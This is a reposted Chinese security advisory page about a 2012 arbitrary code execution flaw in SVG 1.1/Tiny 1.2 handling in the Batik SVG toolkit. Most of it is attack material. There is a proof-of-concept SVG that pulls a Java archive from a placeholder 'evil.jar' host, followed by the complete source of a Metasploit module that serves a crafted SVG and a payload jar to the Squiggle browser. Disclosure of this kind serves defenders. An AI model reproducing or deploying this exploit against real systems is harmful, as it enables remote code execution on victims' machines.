首页 / 操作系统 / Linux / Scalable Vector Graphics (SVG)任意代码执行漏洞
发布日期:2012-05-15 更新日期:2012-05-22受影响系统: W3C SVG Scalable Vector Graphics (SVG) Tiny 1.2 W3C SVG Scalable Vector Graphics (SVG) 1.2 Apache Group Batik SVG Toolkit 1.7 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 53552可缩放矢量图形(Scalable Vector Graphics,SVG)是基于可扩展标记语言(XML),用于描述二维矢量图形的一种图形格式。SVG由W3C制定,是一个开放标准。SVG 1.1和SVG Tiny 1.2规范在实现上存在任意代码执行漏洞,攻击者可利用此漏洞执行任意代码和非法操作。<*来源:Christian Johansson http://www.linuxidc.com/Linux/2012-05/60933.htm *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Christian Johansson ()提供了如下测试方法:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0"> <script type="application/java-archive" xlink:href="http://www.example.com/evil.jar"/> <text>Static text ...</text> </svg> ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##require "msf/core"class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, "Name" => "Squiggle 1.7 SVG Browser Java Code Execution", "Description" => %q{ This module abuses the SVG support to execute Java Code in the Squiggle Browser included in the Batik framework 1.7 through a crafted svg file referencing a jar file. In order to gain arbitrary code execution, the browser must meet the following conditions: (1) It must support at least SVG version 1.1 or newer, (2) It must support Java code and (3) The "Enforce secure scripting" check must be disabled. The module has been tested against Windows and Linux platforms. }, "License" => MSF_LICENSE, "Author" => [ "Nicolas Gregoire", # aka @Agarri_FR, Abuse discovery and PoC "sinn3r", # Metasploit "juan vazquez" # Metasploit ], "References" => [ ["URL", "http://www.agarri.fr/blog/"] ], "Payload" => { "Space" => 20480, "BadChars" => "", "DisableNops" => true }, "DefaultOptions" => { "ExitFunction" => "none" }, "Platform" => ["win", "linux", "java"], "Targets" => [ [ "Generic (Java Payload)", { "Arch" => ARCH_JAVA, } ], [ "Windows Universal", { "Arch" => ARCH_X86, "Platform" => "win" } ], [ "Linux x86", { "Arch" => ARCH_X86, "Platform" => "linux" } ] ], "Privileged" => false, "DisclosureDate" => "May 11 2012", "DefaultTarget" => 0)) end def on_request_uri(cli, request) agent = request.headers["User-Agent"] jar_uri = ("/" == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource jar_uri << "/#{rand_text_alpha(rand(6)+3)}.jar" rand_text = Rex::Text.rand_text_alphanumeric(rand(8)+4) if request.uri =~ /.jar$/ paths = [ [ "Exploit.class" ], [ "Exploit$1.class"], [ "META-INF", "MANIFEST.MF"] ] p = regenerate_payload(cli) jar = p.encoded_jar paths.each do |path| 1.upto(path.length - 1) do |idx| full = path[0,idx].join("/") + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, "") end end fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "batik_svg", path ), "rb") data = fd.read(fd.stat.size) jar.add_file(path.join("/"), data) fd.close end print_status("Sending jar payload") send_response(cli, jar.pack, {"Content-Type"=>"application/java-archive"}) elsif agent =~ /Batik/ svg = %Q| <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0"> <script type="application/java-archive" xlink:href="#{jar_uri}"/> <text>#{rand_text}</text> </svg> | svg = svg.gsub(/ /, "") print_status("Sending svg") send_response(cli, svg, {"Content-Type"=>"image/svg+xml"}) else print_error("I don"t know what the client is requesting: #{request.uri}") end end end建议: -------------------------------------------------------------------------------- 厂商补丁:W3C --- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.w3.org/Graphics/SVG/PE Explorer堆缓冲区溢出漏洞Wireshark多个解析器拒绝服务漏洞相关资讯 任意代码执行漏洞
易网时代-编程资源站